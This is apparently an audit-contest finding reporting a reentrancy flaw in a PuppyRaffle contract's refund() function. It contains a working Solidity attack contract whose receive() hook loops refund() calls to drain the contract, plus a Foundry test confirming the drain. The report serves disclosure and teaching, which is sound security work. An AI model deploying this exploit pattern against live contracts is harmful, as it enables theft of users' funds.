Reentrancy Attack Leading to Fund Draining
Summary
The absence of Checks, Effects, and Interactions (CEI) practices may lead to deviations that can potentially result in a reentrancy attack. It is essential to implement CEI best practices to safeguard the system against such vulnerabilities.
Impact
Draining all funds
Hack function
SmartContract Hack function:
//SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
import { PuppyRaffle } from "./PuppyRaffle.sol";
contract RefundHack {
PuppyRaffle private immutable target;
constructor(address _target) {
target = PuppyRaffle(_target);
}
function attack() external payable {
require(msg.value == target.entranceFee(), "Invalid entrance Fee");
address[] memory arg = new address;
arg[0] = address(this);
bytes memory data = abi.encodeWithSelector(PuppyRaffle.enterRaffle.selector, arg);
(bool success, ) = address(target).call{ value: msg.value }(data);
require(success, "Something gone wrong");
uint256 targetIndex = target.getActivePlayerIndex(address(this));
target.refund(targetIndex);
}
receive() external payable {
uint256 targetIndex = target.getActivePlayerIndex(address(this));
while (address(target).balance >= target.entranceFee()) {
target.refund(targetIndex);
}
}
}
Test Function
function testReentrancyAttackRefund() public {
RefundHack refundHack = new RefundHack(address(puppyRaffle));
address[] memory players = new address;
players[0] = playerOne;
players[1] = playerTwo;
players[2] = address(3);
puppyRaffle.enterRaffle{ value: entranceFee * 3 }(players);
refundHack.attack{ value: entranceFee }();
assert(address(puppyRaffle).balance == 0);
assert(address(refundHack).balance == 4 ether);
}
Tools Used
Foundry
Recommendations
Follow Checks, Effects, Interactions practices
Lead Judging Commences
reentrancy-in-refund
reentrancy in refund() function
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.